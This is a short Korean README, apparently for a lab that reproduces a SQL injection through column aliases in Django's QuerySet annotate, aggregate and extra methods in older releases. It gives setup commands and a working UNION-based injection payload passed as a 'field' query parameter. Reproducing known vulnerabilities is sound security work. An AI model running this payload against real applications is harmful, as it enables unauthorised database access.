
Django 2.2(2.2.28 이전), 3.2(3.2.13 이전), 4.0(4.0.4 이전)에서 문제가 발견되었습니다. QuerySet.annotate(), aggregate(), extra() 메서드는 전달된 **kwargs로 조작된 사전(딕셔너리 확장 포함)을 통해 열 별칭(column aliases)에서 SQL 인젝션에 취약합니다.
poetry install
python manage.py makemigrations
python manage.py migrate
python manage.py loaddata data.json
python manage.py runserver
?field=poc.title" FROM "poc_blog" union SELECT "-1,",sqlite_version(),"3" --
